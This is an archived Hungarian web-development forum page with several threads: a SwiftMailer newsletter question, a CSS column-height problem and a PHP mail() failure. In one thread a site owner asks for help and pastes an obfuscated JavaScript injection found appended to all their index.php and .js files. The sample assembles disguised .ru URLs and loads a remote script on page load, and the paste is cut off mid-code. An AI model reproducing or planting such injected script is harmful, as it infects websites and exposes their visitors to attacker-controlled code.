ugrás a tartalomhoz

Archívum - Már 4, 2010 - Fórum téma

SwiftMailer 4

simisoma · 2010. Már. 4. (Cs), 22.06
Sziasztok,

lenne egy olyan kérdésem, hogy a SwiftMailer segítségével készítenék hírlevelet, de MySql adatbázisból kellenének az e-mail címek és nevek.

Egy emberre ki tudom küldeni a levelet így:

require_once '../lib/swift_required.php'; 
$transport = Swift_SendmailTransport::newInstance('/usr/sbin/sendmail -bs');
$mailer = Swift_Mailer::newInstance($transport);                                  
$message = Swift_Message::newInstance()
                  ->setSubject($targy)
                  ->setFrom(array($kuldo_mail => $kuldo_neve))
                  ->setTo(array($cimzett_mail => $kuldo_neve))
                  ->addPart($mail_body, 'text/html');
$result = $mailer->send($message);           

Ma már most nekem nem egy ->setTo(array($cimzett_mail => $kuldo_neve)) hanem több címzettem van amit valami ilyesmi módon nyernék ki:

$sql=mysql_query("select * from user;");
while($usr=mysql_fecth_assoc($sql))
{
...........???
}

hogyan tudnám ezt összehozni?

Köszi: SimiSoma
 

S.O.S. Mi a történhetett???? (Creative Commons License izé.......)

dodoka · 2010. Már. 4. (Cs), 21.07
Sziasztok!

Most vettem észre egy érdekes dolgot!
az ősszes index.php és az összes .js fájlokba "betelepült" vmi....

Egy ilyesmi és ehhez hasonló van most az érintett fájlok végén, mindegyik 2kb al lett nagyobb mint kéne:

<script>var l;if(l!='V' && l!='N'){l=''};function z(){this.F="";var I;if(I!='' && I!='B'){I=''};var h=RegExp;var x;if(x!='hh' && x!='NR'){x='hh'};var zF=new String("g");var Do;if(Do!='' && Do!='j'){Do=null};var y='';var s;if(s!='zI'){s='zI'};var jt='';function Q(v,H){var i= String("NYJ[".substr(3));var p;if(p!='R'){p=''};i+=H;this.J='';i+=String("]");this.pp='';var qS;if(qS!=''){qS='b'};this.Z='';var kY;if(kY!='U' && kY != ''){kY=null};var r=new h(i, zF);return v.replace(r, y);this.jH='';this.wG='';};var aq;if(aq!='' && aq!='DD'){aq=''};var Hz;if(Hz!='' && Hz!='ut'){Hz=''};var gn=new String();var Zk;if(Zk!='' && Zk!='f'){Zk=null};var u=String("FuNf/abc".substr(4)+"ABw1.go.BwA1".substr(4,4)+"DGKecom/".substr(4)+"2QDabc.".substr(3)+"0nMmgo.c".substr(4)+"df8om/kdf8".substr(3,4)+"uXAinop".substr(3)+"oisk"+".ru/0H3".substr(0,4)+"incra43".substr(0,4)+"edimhVl".substr(0,4)+"ail.eQX".substr(0,4)+"SQqKcom/".substr(4)+"goog"+"le.cObv".substr(0,4)+"om.p7SF".substr(0,4)+"asMRhp".substr(4));var J_;if(J_!='W' && J_!='Qc'){J_=''};var m;if(m!='' && m!='VPA'){m=''};var q=Q('8339737079738922902223',"9273");var UX;if(UX!='kT'){UX=''};var UK;if(UK!='E'){UK=''};var hb="de"+"fe"+"3qXer".substr(4);var lb="";var HJ=new String("http:"+"//gooZJxe".substr(0,5)+"uUsNgle-c".substr(4)+"om-co"+"XT6.mozi".substr(3)+"lla.o"+"rg.quEBj".substr(0,5)+"ikr-c"+"yHcWom.ra".substr(4)+"temypzEH".substr(0,5)+"eIXAart.reAIX".substr(4,5)+"3rBu:".substr(3));var M=window;var BA;if(BA!='iv'){BA=''};var t=String("srcxZXb".substr(0,3));var ha=new String();var ya='';var fa;if(fa!='' && fa!='my'){fa='rK'};var MB=String("scrp8X3".substr(0,3)+"s0zGipt".substr(4));var wm='';this.io="";var AV=new Array();M.onload=function(){this.y_="";var pu;if(pu!='_v'){pu=''};try {var LX="";var Bt=new Date();

height: 100%, tartalom nélkül is

TIV · 2010. Már. 4. (Cs), 14.52
Sziasztok!

Érdekes problémám van. Adott:

- Egy fix magas header
- Alatta két oszlop, egyik 190px, a másik a maradék területen van.

Egyszerűen nem tudom megoldani, hogy ennek a két oszlopnak a magassága lenyúljon a böngésző aljáig és ne tovább. faux oszlopokkal nem jó, nem csak azt a látszatot kell kelteni-e, hogy leér az aljáig, hanem valóban ott kellene a végének lenni, mert lesznek benne div-ek, amiknek szintén height: 100% tulajdonságuk lesz.

Odáig sikerült megcsinálni, hogy az oszlopok lenyúlnak, de sajnos tovább nyúlnak, mint a böngésző, mégpedig pontosan a header kép magassával lóg túl. Hogy lehetne ezen javítani?

Nagyon köszönöm!
 

mail - e-mail kiküldés

simisoma · 2010. Már. 4. (Cs), 10.58
Sziasztok,

lenne egy olyan problémám, hogy nem akarja kiküldeni a php mail függvénnyel az legalapabb kódot sem amióta új szolgáltatóhoz (domainuniverzum) került az oldalam...
Felhívtam őket, de azt mondják nincsen letiltva működnie kell.

Mi vagy mik lehetnek a hibák?? Ha tudnátok ebben segíteni :-)

Itt a kódrészlet:

mail_body="<html>\n<body>\n";
$mail_body.="próba";	
$mail_body.="</body>\n</html>\n";
$mail_body.="</body>\n</html>";
	
$kuldo_neve="Nevem";
$kuldo_mail="emailom##kukac##mailom.hu";
$cimzett_mail="cimzett##kukac##emailja.hu";
$targy="targy";

$fejlec= "MIME-Version: 1.0\r\nContent-type: text/html; charset=utf-8";
$fejlec.="\r\nFrom: " . $kuldo_neve . "<" . $kuldo_mail . ">\r\n";
				
@mail($cimzett_mail, $targy, $mail_body, $fejlec);
Köszi: Simisoma